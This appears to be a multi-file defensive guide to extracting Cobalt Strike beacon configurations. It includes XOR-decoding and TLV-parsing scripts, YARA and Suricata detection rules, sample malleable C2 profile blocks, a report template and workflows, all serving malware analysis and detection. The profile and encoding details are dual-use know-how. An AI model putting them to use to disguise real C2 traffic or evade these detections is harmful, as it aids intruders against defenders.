Cobalt Strike beacons store their configuration as a blob of TLV (Type-Length-Value) entries within the .data section of the PE. Stageless beacons XOR the entire beacon code with a 4-byte key, while the configuration blob itself uses a single-byte XOR key. Each entry begins with a 6-byte header: a 2-byte setting identifier (e.g., 0x0001 for BeaconType, 0x0008 for C2Server), a 2-byte data type (1 = short, 2 = integer, 3 = string/blob), and a 2-byte length. The variable-length value follows the header.
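
To make the layout concrete, the sketch below packs and unpacks a single entry using the six-byte header that the manual parser in Step 2 reads (setting ID, data type, length) and the single-byte XOR key cited for version 4. The helper names are hypothetical and the entry is synthetic, not taken from a real sample.

```python
import struct

XOR_KEY = 0x2E  # single-byte key cited above for version 4 beacons


def xor_bytes(data, key):
    """XOR every byte with a single-byte key (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def pack_entry(setting_id, data_type, value):
    """Pack one entry: 2-byte ID, 2-byte data type, 2-byte length, then the value."""
    return struct.pack(">HHH", setting_id, data_type, len(value)) + value


def unpack_entry(blob):
    """Return (setting_id, data_type, value) for the entry at the start of blob."""
    setting_id, data_type, length = struct.unpack(">HHH", blob[:6])
    return setting_id, data_type, blob[6:6 + length]


# Synthetic entry: setting 0x0002 (Port), data type 1 (short), value 443
plain = pack_entry(0x0002, 1, struct.pack(">H", 443))
encoded = xor_bytes(plain, XOR_KEY)

setting_id, data_type, raw = unpack_entry(xor_bytes(encoded, XOR_KEY))
port = struct.unpack(">H", raw)[0]
print(hex(setting_id), data_type, port)
```

Because XOR with a fixed key is symmetric, the same `xor_bytes` call both encodes and decodes the blob.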
|
||||
|
||||
### Malleable C2 Profiles
|
||||
|
||||
The beacon configuration encodes the malleable C2 profile that dictates HTTP request/response transformations, including URI paths, headers, metadata encoding (Base64, NetBIOS), and data transforms. Analyzing these settings reveals how the beacon disguises its traffic to blend with legitimate web traffic.
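
As an illustration of one metadata transform, the sketch below implements NetBIOS-style encoding under the assumption that each byte is split into two nibbles and each nibble is added to a base letter (`a` for the lowercase variant). The function names are hypothetical; verify the scheme against your own traffic captures before relying on it.

```python
def netbios_encode(data, base="a"):
    """Encode bytes as two letters per byte (high nibble first, then low nibble)."""
    offset = ord(base)
    return "".join(
        chr((b >> 4) + offset) + chr((b & 0x0F) + offset) for b in data
    )


def netbios_decode(text, base="a"):
    """Reverse netbios_encode: combine each letter pair back into one byte."""
    offset = ord(base)
    pairs = zip(text[0::2], text[1::2])
    return bytes(((ord(hi) - offset) << 4) | (ord(lo) - offset) for hi, lo in pairs)


encoded = netbios_encode(b"\x12\xab")
print(encoded)
print(netbios_decode(encoded))
```

Encoded metadata of this kind doubles in length and uses only sixteen distinct letters, which can itself be a useful detection heuristic.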
|
||||
|
||||
### Watermark and License Identification
|
||||
|
||||
Each Cobalt Strike license embeds a unique watermark (4-byte integer) into generated beacons. Extracting the watermark can link multiple beacons to the same operator or cracked license. Known watermark databases maintained by threat intelligence providers map watermarks to specific threat actors or leaked license keys.
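
Clustering samples by watermark can be sketched as a simple grouping step. The sample identifiers and watermark values below are made up for illustration, and `group_by_watermark` is a hypothetical helper.

```python
from collections import defaultdict


def group_by_watermark(samples):
    """Return watermarks shared by more than one sample, with their sample IDs."""
    groups = defaultdict(list)
    for sample in samples:
        groups[sample["watermark"]].append(sample["sample_id"])
    return {wm: ids for wm, ids in groups.items() if len(ids) > 1}


# Hypothetical extraction results; the watermark values are invented
samples = [
    {"sample_id": "beacon-a", "watermark": 100000001},
    {"sample_id": "beacon-b", "watermark": 100000002},
    {"sample_id": "beacon-c", "watermark": 100000001},
]

shared = group_by_watermark(samples)
print(shared)
```

A shared watermark is a lead rather than proof of a common operator, since a cracked or leaked license can be reused by unrelated actors.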
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Extract Configuration with CobaltStrikeParser
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Extract Cobalt Strike beacon config from PE or memory dump."""
|
||||
import sys
|
||||
import json
|
||||
|
||||
# Using Fox-IT's dissect.cobaltstrike library (not SentinelOne's CobaltStrikeParser)
|
||||
# pip install dissect.cobaltstrike
|
||||
from dissect.cobaltstrike.beacon import BeaconConfig
|
||||
|
||||
def extract_beacon_config(filepath):
    """Parse beacon configuration from file."""
    # from_path() returns a single BeaconConfig and raises ValueError
    # when no configuration block is found in the file.
    try:
        config = BeaconConfig.from_path(filepath)
    except ValueError:
        print(f"[-] No beacon configuration found in {filepath}")
        return None

    print("\n[+] Beacon Configuration")
    print(f"{'='*60}")

    # Copy the parsed settings into a plain dict keyed by setting name
    settings = dict(config.settings)

    # Critical fields for incident response
    critical_fields = [
        "SETTING_C2_REQUEST",
        "SETTING_C2_RECOVER",
        "SETTING_PUBKEY",
        "SETTING_DOMAINS",
        "SETTING_BEACONTYPE",
        "SETTING_PORT",
        "SETTING_SLEEPTIME",
        "SETTING_JITTER",
        "SETTING_MAXGET",
        "SETTING_SPAWNTO_X86",
        "SETTING_SPAWNTO_X64",
        "SETTING_PIPENAME",
        "SETTING_WATERMARK",
        "SETTING_C2_VERB_GET",
        "SETTING_C2_VERB_POST",
        "SETTING_USERAGENT",
        "SETTING_PROTOCOL",
    ]

    # Fields missing from this beacon's configuration print as N/A
    for field in critical_fields:
        value = settings.get(field, "N/A")
        print(f"  {field}: {value}")

    return settings
|
||||
|
||||
|
||||
def extract_c2_indicators(config):
|
||||
"""Extract actionable C2 indicators from beacon config."""
|
||||
indicators = {
|
||||
"c2_domains": [],
|
||||
"c2_ips": [],
|
||||
"c2_urls": [],
|
||||
"user_agent": "",
|
||||
"named_pipes": [],
|
||||
"spawn_processes": [],
|
||||
"watermark": "",
|
||||
}
|
||||
|
||||
if not config:
|
||||
return indicators
|
||||
|
||||
# Extract C2 domains
|
||||
domains = config.get("SETTING_DOMAINS", "")
|
||||
if domains:
|
||||
for domain in str(domains).split(","):
|
||||
domain = domain.strip().rstrip("/")
|
||||
if domain:
|
||||
indicators["c2_domains"].append(domain)
|
||||
|
||||
# Extract user agent
|
||||
indicators["user_agent"] = str(config.get("SETTING_USERAGENT", ""))
|
||||
|
||||
# Extract named pipes
|
||||
pipe = config.get("SETTING_PIPENAME", "")
|
||||
if pipe:
|
||||
indicators["named_pipes"].append(str(pipe))
|
||||
|
||||
# Extract spawn-to processes
|
||||
for arch in ["SETTING_SPAWNTO_X86", "SETTING_SPAWNTO_X64"]:
|
||||
proc = config.get(arch, "")
|
||||
if proc:
|
||||
indicators["spawn_processes"].append(str(proc))
|
||||
|
||||
# Extract watermark
|
||||
indicators["watermark"] = str(config.get("SETTING_WATERMARK", ""))
|
||||
|
||||
return indicators
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print(f"Usage: {sys.argv[0]} <beacon_file_or_dump>")
|
||||
sys.exit(1)
|
||||
|
||||
config = extract_beacon_config(sys.argv[1])
|
||||
if config:
|
||||
indicators = extract_c2_indicators(config)
|
||||
print(f"\n[+] Extracted C2 Indicators:")
|
||||
print(json.dumps(indicators, indent=2))
|
||||
```
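
One detail worth illustrating: parsers commonly render the C2 server setting as alternating host and URI values in a single comma-separated string, so splitting on commas alone mixes URIs in with domains. The sketch below assumes that alternating format. `split_c2_server` is a hypothetical helper and the hostnames are placeholders.

```python
def split_c2_server(c2_server):
    """Split 'host,/uri,host,/uri' into (host, uri) pairs."""
    parts = [p.strip() for p in str(c2_server).split(",") if p.strip()]
    # Even positions are hosts, odd positions are the matching URIs
    return list(zip(parts[0::2], parts[1::2]))


pairs = split_c2_server("c2.example.test,/updates,cdn.example.test,/pixel.gif")
for host, uri in pairs:
    print(f"{host}{uri}")
```

The resulting pairs could populate separate domain and URL indicator lists instead of a single mixed list.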
|
||||
|
||||
### Step 2: Manual XOR Decryption of Beacon Config
|
||||
|
||||
```python
|
||||
import struct
|
||||
|
||||
def find_and_decrypt_config(data):
    """Manually locate and decrypt beacon configuration."""
    # Cobalt Strike 4.x uses 0x2e as XOR key, 3.x uses 0x69
    xor_keys = [0x2e, 0x69]  # v4, v3

    # The plaintext config starts with the BeaconType entry header:
    # setting ID 0x0001, data type 0x0001 (short), length 0x0002.
    # Matching all six bytes keeps the TLV parser aligned on the first entry.
    header = bytes([0x00, 0x01, 0x00, 0x01, 0x00, 0x02])

    for xor_key in xor_keys:
        # Search for the XOR-encoded form of that header
        magic = bytes(b ^ xor_key for b in header)

        offset = data.find(magic)
        if offset == -1:
            continue

        print(f"[+] Found config at offset 0x{offset:x} (XOR key: 0x{xor_key:02x})")

        # Decrypt the config blob (typically 4096 bytes)
        config_size = 4096
        encrypted = data[offset:offset + config_size]
        decrypted = bytes([b ^ xor_key for b in encrypted])

        # Parse TLV entries
        entries = parse_tlv(decrypted)
        return entries

    return None
|
||||
|
||||
|
||||
def parse_tlv(data):
    """Parse Type-Length-Value configuration entries."""
    entries = {}
    offset = 0

    # Setting ID mapping (partial), following the numbering used by public
    # parsers such as CobaltStrikeParser. IDs not listed here are reported
    # as Unknown_0xNNNN.
    field_names = {
        0x0001: "BeaconType",
        0x0002: "Port",
        0x0003: "SleepTime",
        0x0004: "MaxGetSize",
        0x0005: "Jitter",
        0x0006: "MaxDNS",
        0x0007: "PublicKey",
        0x0008: "C2Server",
        0x0009: "UserAgent",
        0x000a: "PostURI",
        0x000b: "Malleable_C2_Instructions",
        0x000c: "HttpGet_Metadata",
        0x000d: "HttpPost_Metadata",
        0x000e: "SpawnTo",
        0x000f: "PipeName",
        0x001a: "HttpGet_Verb",
        0x001b: "HttpPost_Verb",
        0x001d: "SpawnTo_x86",
        0x001e: "SpawnTo_x64",
        0x001f: "CryptoScheme",
        0x0020: "Proxy_Config",
        0x0025: "Watermark",
        0x0028: "KillDate",
        0x0036: "C2_HostHeader",
    }

    while offset + 6 <= len(data):
        # 6-byte header: setting ID, data type, value length (all big-endian)
        entry_type = struct.unpack(">H", data[offset:offset+2])[0]
        entry_len_type = struct.unpack(">H", data[offset+2:offset+4])[0]
        entry_len = struct.unpack(">H", data[offset+4:offset+6])[0]

        if entry_type == 0:
            break

        value_start = offset + 6
        value_end = value_start + entry_len
        value_data = data[value_start:value_end]

        field_name = field_names.get(entry_type, f"Unknown_0x{entry_type:04x}")

        if entry_len_type == 1 and len(value_data) >= 2:  # Short
            value = struct.unpack(">H", value_data[:2])[0]
        elif entry_len_type == 2 and len(value_data) >= 4:  # Int
            value = struct.unpack(">I", value_data[:4])[0]
        elif entry_len_type == 3:  # String/Blob
            value = value_data.rstrip(b'\x00').decode('utf-8', errors='replace')
        else:
            # Unknown data type or truncated value: keep the raw bytes as hex
            value = value_data.hex()

        entries[field_name] = value
        print(f"  {field_name}: {value}")

        offset = value_end

    return entries
|
||||
```
|
||||
|
||||
### Step 3: YARA Rule for Beacon Detection
|
||||
|
||||
```python
|
||||
import yara
|
||||
|
||||
# Raw string so the backslash escapes in $str_pipe reach YARA unmodified
cobalt_strike_rule = r"""
|
||||
rule CobaltStrike_Beacon_Config {
|
||||
meta:
|
||||
description = "Detects Cobalt Strike beacon configuration"
|
||||
author = "Malware Analysis Team"
|
||||
date = "2025-01-01"
|
||||
|
||||
strings:
|
||||
        // XOR'd config header for CS 4.x (key 0x2e): 00 01 00 01 00 02
        $config_v4 = { 2e 2f 2e 2f 2e 2c }

        // XOR'd config header for CS 3.x (key 0x69): 00 01 00 01 00 02
        $config_v3 = { 69 68 69 68 69 6b }
|
||||
|
||||
// Common beacon strings
|
||||
$str_pipe = "\\\\.\\pipe\\" ascii wide
|
||||
$str_beacon = "beacon" ascii nocase
|
||||
$str_sleeptime = "sleeptime" ascii nocase
|
||||
|
||||
// Reflective loader pattern
|
||||
$reflective = { 4D 5A 41 52 55 48 89 E5 }
|
||||
|
||||
condition:
|
||||
($config_v4 or $config_v3) or
|
||||
(2 of ($str_*) and $reflective)
|
||||
}
|
||||
"""
|
||||
|
||||
def scan_for_beacons(filepath):
|
||||
"""Scan file with YARA rules for Cobalt Strike beacons."""
|
||||
rules = yara.compile(source=cobalt_strike_rule)
|
||||
matches = rules.match(filepath)
|
||||
|
||||
for match in matches:
|
||||
print(f"[+] YARA Match: {match.rule}")
|
||||
for string_match in match.strings:
|
||||
offset = string_match.instances[0].offset
|
||||
print(f" String: {string_match.identifier} at offset 0x{offset:x}")
|
||||
|
||||
return matches
|
||||
```
|
||||
|
||||
### Step 4: Network Traffic Correlation
|
||||
|
||||
```python
|
||||
from dissect.cobaltstrike.c2 import HttpC2Config
|
||||
|
||||
def analyze_c2_profile(beacon_config):
|
||||
"""Analyze malleable C2 profile from beacon configuration."""
|
||||
print("\n[+] Malleable C2 Profile Analysis")
|
||||
print("=" * 60)
|
||||
|
||||
# HTTP GET configuration
|
||||
get_verb = beacon_config.get("SETTING_C2_VERB_GET", "GET")
|
||||
get_uri = beacon_config.get("SETTING_C2_REQUEST", "")
|
||||
print(f"\n HTTP GET Request:")
|
||||
print(f" Verb: {get_verb}")
|
||||
print(f" URI: {get_uri}")
|
||||
|
||||
# HTTP POST configuration
|
||||
post_verb = beacon_config.get("SETTING_C2_VERB_POST", "POST")
|
||||
post_uri = beacon_config.get("SETTING_C2_POSTREQ", "")
|
||||
print(f"\n HTTP POST Request:")
|
||||
print(f" Verb: {post_verb}")
|
||||
print(f" URI: {post_uri}")
|
||||
|
||||
# User Agent
|
||||
ua = beacon_config.get("SETTING_USERAGENT", "")
|
||||
print(f"\n User-Agent: {ua}")
|
||||
|
||||
# Host header
|
||||
host = beacon_config.get("SETTING_C2_HOSTHEADER", "")
|
||||
print(f" Host Header: {host}")
|
||||
|
||||
# Sleep and jitter for traffic pattern
|
||||
sleep_ms = beacon_config.get("SETTING_SLEEPTIME", 60000)
|
||||
jitter = beacon_config.get("SETTING_JITTER", 0)
|
||||
print(f"\n Sleep Time: {sleep_ms}ms")
|
||||
print(f" Jitter: {jitter}%")
|
||||
|
||||
# Generate Suricata/Snort signatures
|
||||
print(f"\n[+] Suggested Network Signatures:")
|
||||
if ua:
|
||||
print(f' alert http any any -> any any (msg:"CS Beacon UA"; '
|
||||
f'content:"{ua}"; http_user_agent; sid:1000001; rev:1;)')
|
||||
if get_uri:
|
||||
print(f' alert http any any -> any any (msg:"CS Beacon URI"; '
|
||||
f'content:"{get_uri}"; http_uri; sid:1000002; rev:1;)')
|
||||
```
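
The sleep and jitter values can also be checked against observed traffic. The sketch below assumes that jitter shortens each sleep by a random amount up to the configured percentage, so check-in gaps should fall between `sleep * (1 - jitter/100)` and `sleep`. The function names and the 500 ms tolerance are hypothetical.

```python
def beacon_interval_range(sleep_ms, jitter_pct):
    """Return (min_ms, max_ms) for the expected gap between check-ins."""
    min_ms = sleep_ms * (100 - jitter_pct) // 100
    return min_ms, sleep_ms


def matches_profile(observed_gaps_ms, sleep_ms, jitter_pct, tolerance_ms=500):
    """Check that every observed gap falls inside the expected range, plus tolerance."""
    low, high = beacon_interval_range(sleep_ms, jitter_pct)
    return all(
        low - tolerance_ms <= gap <= high + tolerance_ms
        for gap in observed_gaps_ms
    )


print(beacon_interval_range(60000, 20))
print(matches_profile([50000, 59000, 48200], 60000, 20))
```

The tolerance absorbs network latency and timestamp rounding. Gaps far outside the range suggest a different profile or an operator who changed the sleep time interactively.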
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Beacon configuration successfully extracted from PE file or memory dump
|
||||
- C2 server domains/IPs correctly identified with port and protocol
|
||||
- Malleable C2 profile parameters decoded showing HTTP transforms
|
||||
- Watermark value extracted for attribution correlation
|
||||
- Sleep time and jitter values match observed network beacon intervals
|
||||
- YARA rules detect beacon in both packed and unpacked samples
|
||||
- Network signatures generated from extracted C2 profile
|
||||
|
||||
## References
|
||||
|
||||
- [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser)
|
||||
- [dissect.cobaltstrike Library](https://github.com/fox-it/dissect.cobaltstrike)
|
||||
- [SentinelLabs Beacon Configuration Analysis](https://www.sentinelone.com/labs/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/)
|
||||
- [Cobalt Strike Staging and Config Extraction](https://blog.securehat.co.uk/cobaltstrike/extracting-config-from-cobaltstrike-stager-shellcode)
|
||||
- [MITRE ATT&CK - Cobalt Strike S0154](https://attack.mitre.org/software/S0154/)
|
||||
@@ -0,0 +1,95 @@
|
||||
# Cobalt Strike Beacon Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Report ID | CS-BEACON-YYYY-NNNN |
|
||||
| Date | YYYY-MM-DD |
|
||||
| Sample Hash (SHA-256) | |
|
||||
| Classification | TLP:AMBER |
|
||||
| Analyst | |
|
||||
|
||||
## Beacon Configuration Summary
|
||||
|
||||
| Setting | Value |
|
||||
|---------|-------|
|
||||
| Beacon Type | HTTP / HTTPS / SMB / DNS |
|
||||
| C2 Server(s) | |
|
||||
| Port | |
|
||||
| Sleep Time | ms |
|
||||
| Jitter | % |
|
||||
| User-Agent | |
|
||||
| Watermark | |
|
||||
| SpawnTo (x86) | |
|
||||
| SpawnTo (x64) | |
|
||||
| Named Pipe | |
|
||||
| Host Header | |
|
||||
| Crypto Scheme | |
|
||||
|
||||
## C2 Infrastructure
|
||||
|
||||
| Indicator | Type | Value | Context |
|
||||
|-----------|------|-------|---------|
|
||||
| C2 Domain | domain | | Primary callback |
|
||||
| C2 IP | ip | | Resolved address |
|
||||
| URI Path (GET) | uri | | Beacon check-in |
|
||||
| URI Path (POST) | uri | | Data exfiltration |
|
||||
|
||||
## Malleable C2 Profile
|
||||
|
||||
### HTTP GET Configuration
|
||||
| Parameter | Value |
|
||||
|-----------|-------|
|
||||
| URI | |
|
||||
| Verb | |
|
||||
| Headers | |
|
||||
| Metadata Encoding | |
|
||||
|
||||
### HTTP POST Configuration
|
||||
| Parameter | Value |
|
||||
|-----------|-------|
|
||||
| URI | |
|
||||
| Verb | |
|
||||
| ID Encoding | |
|
||||
| Output Encoding | |
|
||||
|
||||
## Watermark Attribution
|
||||
|
||||
| Watermark | Known Association | Confidence |
|
||||
|-----------|------------------|------------|
|
||||
| | Cracked / Licensed / Threat Actor | High/Med/Low |
|
||||
|
||||
## Network Detection Signatures
|
||||
|
||||
```
|
||||
# Suricata signature for beacon C2 traffic
# (a rule must be on one line or use backslash continuations)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"Cobalt Strike Beacon C2 Communication"; \
    content:"[USER_AGENT]"; http_user_agent; \
    content:"[URI_PATH]"; http_uri; \
    sid:1000001; rev:1; \
)
|
||||
```
|
||||
|
||||
## YARA Detection Rule
|
||||
|
||||
```yara
|
||||
rule CobaltStrike_Beacon_[CAMPAIGN] {
    meta:
        description = "Detects Cobalt Strike beacon from [CAMPAIGN]"
        hash = "[SHA256]"
    strings:
        $c2 = "[C2_DOMAIN]" ascii
        $pipe = "[NAMED_PIPE]" ascii
        $ua = "[USER_AGENT]" ascii
    condition:
        2 of them
}
|
||||
```
|
||||
|
||||
## Recommendations
|
||||
|
||||
1. **Block**: Add C2 domains/IPs to firewall deny lists
|
||||
2. **Hunt**: Search for named pipe and spawn-to process in endpoint logs
|
||||
3. **Detect**: Deploy YARA and network signatures to detection stack
|
||||
4. **Correlate**: Check watermark against threat intelligence databases
|
||||
@@ -0,0 +1,94 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## Cobalt Strike Beacon Configuration Fields
|
||||
|
||||
### Configuration TLV Types
|
||||
| Type ID | Field Name | Data Type | Description |
|---------|------------|-----------|-------------|
| 0x0001 | BeaconType | Short | 0=HTTP, 1=Hybrid HTTP/DNS, 2=SMB, 4=TCP, 8=HTTPS, 16=TCP Bind |
| 0x0002 | Port | Short | C2 communication port |
| 0x0003 | SleepTime | Int | Beacon callback interval in milliseconds |
| 0x0005 | Jitter | Short | Percentage of sleep time randomization (0-99) |
| 0x0008 | C2Server | String | Comma-separated C2 domains/IPs |
| 0x0009 | UserAgent | String | HTTP User-Agent header value |
| 0x000a | PostURI | String | URI for HTTP POST requests |
| 0x000f | PipeName | String | Named pipe for SMB beacon |
| 0x001d | SpawnTo_x86 | String | 32-bit process to spawn for post-ex |
| 0x001e | SpawnTo_x64 | String | 64-bit process to spawn for post-ex |
| 0x0020 | ProxyHostname | String | Proxy server address |
| 0x0025 | Watermark | Int | License watermark identifier |
| 0x0036 | HostHeader | String | HTTP Host header value |
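
To make the table concrete, the sketch below reads one decoded entry as a 6-byte big-endian header (type ID, data type, length) followed by the value. It assumes the data-type codes 1=short, 2=int, 3=string used by this skill's helper script; `parse_entry` and the sample bytes are hypothetical and built by hand, not taken from a real beacon.

```python
import struct


def parse_entry(buf, offset=0):
    """Parse one TLV entry and return (type_id, value, next_offset)."""
    type_id, data_type, length = struct.unpack_from(">HHH", buf, offset)
    raw = buf[offset + 6:offset + 6 + length]
    if data_type == 1:      # short: 2-byte big-endian integer
        value = struct.unpack(">H", raw[:2])[0]
    elif data_type == 2:    # int: 4-byte big-endian integer
        value = struct.unpack(">I", raw[:4])[0]
    elif data_type == 3:    # string: NUL-padded bytes
        value = raw.rstrip(b"\x00").decode("utf-8", errors="replace")
    else:                   # unknown data type: keep as hex
        value = raw.hex()
    return type_id, value, offset + 6 + length


# Hand-built sample: Port (0x0002) = 443, then SleepTime (0x0003) = 60000 ms
sample = (struct.pack(">HHHH", 0x0002, 1, 2, 443)
          + struct.pack(">HHHI", 0x0003, 2, 4, 60000))
type_id, port, next_offset = parse_entry(sample)
_, sleep_ms, _ = parse_entry(sample, next_offset)
print(hex(type_id), port, sleep_ms)  # 0x2 443 60000
```

Returning the next offset lets a caller walk the blob entry by entry and stop at the first type ID of zero.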
|
||||
|
||||
### XOR Encoding Scheme
|
||||
- **Cobalt Strike 3.x**: XOR key = 0x69
|
||||
- **Cobalt Strike 4.x**: XOR key = 0x2e
|
||||
- Configuration blob size: 4096 bytes (typical)
|
||||
- Encoding: Single-byte XOR across entire config blob
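
A minimal sketch of the single-byte XOR scheme, assuming the decoded blob begins with the BeaconType entry header (`00 01 00 01 00 02`). The helper names `xor_bytes` and `guess_key` are illustrative only, and the version labels simply mirror the list above.

```python
KNOWN_KEYS = {0x69: "Cobalt Strike 3.x", 0x2e: "Cobalt Strike 4.x"}

# Assumed start of a decoded config: type 0x0001, data type short, length 2
CONFIG_START = bytes([0x00, 0x01, 0x00, 0x01, 0x00, 0x02])


def xor_bytes(data, key):
    """Apply a single-byte XOR key to every byte (encode and decode are identical)."""
    return bytes(b ^ key for b in data)


def guess_key(blob):
    """Return the known key that decodes the blob to the expected header, else None."""
    for key in KNOWN_KEYS:
        if xor_bytes(blob[:len(CONFIG_START)], key) == CONFIG_START:
            return key
    return None


encoded = xor_bytes(CONFIG_START + b"\x00\x08", 0x2e)
print(encoded[:6].hex())        # 2e2f2e2f2e2c
print(hex(guess_key(encoded)))  # 0x2e
```

Samples built with a non-default key will not match either entry, so a `None` result does not rule out a beacon.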
|
||||
|
||||
### Stageless Beacon Structure
|
||||
- PE with beacon code in .data section
|
||||
- 4-byte XOR key applied to .data section content
|
||||
- Configuration embedded after beacon code
|
||||
- Reflective DLL loader prepended to beacon
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
|
||||
### Cobalt Strike Techniques (S0154)
|
||||
| Technique | ID | Description |
|
||||
|-----------|-----|------------|
|
||||
| Application Layer Protocol | T1071.001 | HTTP/HTTPS C2 communication |
|
||||
| Encrypted Channel: Symmetric Cryptography | T1573.001 | AES-256 encrypted C2 |
|
||||
| Ingress Tool Transfer | T1105 | Download additional payloads |
|
||||
| Process Injection | T1055 | Inject into spawned processes |
|
||||
| Lateral Tool Transfer | T1570 | Payload transfer during SMB beacon lateral movement |
|
||||
| Service Execution | T1569.002 | PSExec-style lateral movement |
|
||||
| Reflective Code Loading | T1620 | In-memory beacon loading |
|
||||
|
||||
## Malleable C2 Profile Structure
|
||||
|
||||
### HTTP GET Block
|
||||
```
|
||||
http-get {
    set uri "/path";
    client {
        header "Accept" "text/html";
        metadata {
            base64url;
            prepend "session=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/html";
        output {
            print;
        }
    }
}
|
||||
```
|
||||
|
||||
### HTTP POST Block
|
||||
```
|
||||
http-post {
    set uri "/submit";
    client {
        id {
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}
|
||||
```
|
||||
|
||||
## References
|
||||
- [Cobalt Strike Documentation](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/)
|
||||
- [Malleable C2 Profile Reference](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/malleable-c2_main.htm)
|
||||
- [MITRE ATT&CK Cobalt Strike](https://attack.mitre.org/software/S0154/)
|
||||
@@ -0,0 +1,72 @@
|
||||
# Cobalt Strike Beacon Analysis Workflows
|
||||
|
||||
## Workflow 1: PE File Configuration Extraction
|
||||
|
||||
```
|
||||
[Suspicious PE] --> [Unpack if packed] --> [Locate .data section] --> [XOR Decrypt]
|
||||
|
|
||||
v
|
||||
[Parse TLV Config]
|
||||
|
|
||||
v
|
||||
[Extract C2 Indicators]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Triage**: Identify file as potential Cobalt Strike beacon via YARA or AV detection
|
||||
2. **Unpacking**: If packed, unpack using appropriate tool (UPX, custom unpacker)
|
||||
3. **Section Analysis**: Locate .data section containing XOR'd beacon code
|
||||
4. **XOR Key Discovery**: Try known keys (0x2e, 0x69) or brute-force 4-byte key
|
||||
5. **Config Parsing**: Parse decrypted TLV entries for C2 and operational settings
|
||||
6. **IOC Extraction**: Extract domains, IPs, URIs, user agents, watermarks
|
||||
|
||||
## Workflow 2: Memory Dump Beacon Extraction
|
||||
|
||||
```
|
||||
[Memory Dump] --> [Volatility3 malfind] --> [Dump Injected Regions] --> [Parse Config]
|
||||
|
|
||||
v
|
||||
[C2 Infrastructure Map]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Acquisition**: Capture memory dump from compromised system
|
||||
2. **Process Scan**: Use Volatility3 to identify suspicious processes
|
||||
3. **Injection Detection**: Use malfind to find RWX memory regions
|
||||
4. **Region Extraction**: Dump injected memory regions to files
|
||||
5. **Config Search**: Scan dumps for beacon configuration signatures
|
||||
6. **Infrastructure Mapping**: Correlate extracted C2 with network logs
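
The config search in step 5 can be sketched as a scan for the XOR-encoded start of the configuration. This assumes the decoded config begins with `00 01 00 01 00 02` and that one of the two default keys is in use; `find_config_offsets` is a hypothetical helper and the dump below is synthetic.

```python
def find_config_offsets(dump, keys=(0x2e, 0x69)):
    """Return sorted (offset, key) pairs where an encoded config header appears."""
    header = bytes([0x00, 0x01, 0x00, 0x01, 0x00, 0x02])
    hits = []
    for key in keys:
        marker = bytes(b ^ key for b in header)
        start = 0
        while (pos := dump.find(marker, start)) != -1:
            hits.append((pos, key))
            start = pos + 1  # keep scanning for further candidates
    return sorted(hits)


# Synthetic dump with one candidate per key
marker_3x = bytes(b ^ 0x69 for b in b"\x00\x01\x00\x01\x00\x02")
marker_4x = bytes(b ^ 0x2e for b in b"\x00\x01\x00\x01\x00\x02")
dump = b"\x90" * 16 + marker_3x + b"\x00" * 8 + marker_4x
print(find_config_offsets(dump))  # [(16, 105), (30, 46)]
```

Each hit is only a candidate; parsing the decoded bytes at that offset into plausible TLV entries is what confirms it.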
|
||||
|
||||
## Workflow 3: Watermark Attribution
|
||||
|
||||
```
|
||||
[Multiple Beacons] --> [Extract Watermarks] --> [Cluster by Watermark] --> [Attribution]
|
||||
|
|
||||
v
|
||||
[Campaign Correlation]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Collection**: Gather beacon samples from incident or threat intel feeds
|
||||
2. **Watermark Extraction**: Extract watermark value from each sample
|
||||
3. **Database Lookup**: Check watermark against known databases
|
||||
4. **Clustering**: Group beacons sharing the same watermark
|
||||
5. **Infrastructure Overlap**: Correlate C2 infrastructure across cluster
|
||||
6. **Attribution Assessment**: Link to known threat actor or cracked license
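
Steps 4 and 5 can be sketched as a grouping pass over already-extracted indicators. The record layout (`file`, `watermark`, `c2_servers`) and every value below are hypothetical placeholders, not real samples.

```python
from collections import defaultdict


def cluster_by_watermark(samples):
    """Group sample files and their C2 servers by watermark value."""
    clusters = defaultdict(lambda: {"files": [], "c2": set()})
    for sample in samples:
        watermark = sample.get("watermark") or "unknown"
        clusters[watermark]["files"].append(sample["file"])
        clusters[watermark]["c2"].update(sample.get("c2_servers", []))
    return dict(clusters)


samples = [
    {"file": "a.bin", "watermark": "12345", "c2_servers": ["c2.example.com"]},
    {"file": "b.bin", "watermark": "12345", "c2_servers": ["192.0.2.10"]},
    {"file": "c.bin", "watermark": "", "c2_servers": ["c2.example.net"]},
]
for watermark, cluster in cluster_by_watermark(samples).items():
    print(watermark, cluster["files"], sorted(cluster["c2"]))
```

A shared watermark on its own is weak evidence, since cracked or leaked copies reuse the same value across unrelated operators; the overlapping C2 set is what strengthens the link.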
|
||||
|
||||
## Workflow 4: C2 Traffic Detection
|
||||
|
||||
```
|
||||
[Beacon Config] --> [Extract C2 Profile] --> [Generate Signatures] --> [Deploy to NIDS]
|
||||
|
|
||||
v
|
||||
[Monitor Network Traffic]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Profile Extraction**: Parse malleable C2 profile from beacon config
|
||||
2. **Pattern Identification**: Identify unique HTTP headers, URIs, and encoding
|
||||
3. **Signature Creation**: Write Suricata/Snort rules matching C2 patterns
|
||||
4. **Deployment**: Deploy signatures to network detection infrastructure
|
||||
5. **Validation**: Test signatures against captured beacon traffic
|
||||
6. **Monitoring**: Alert on matching network flows for active beacons
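
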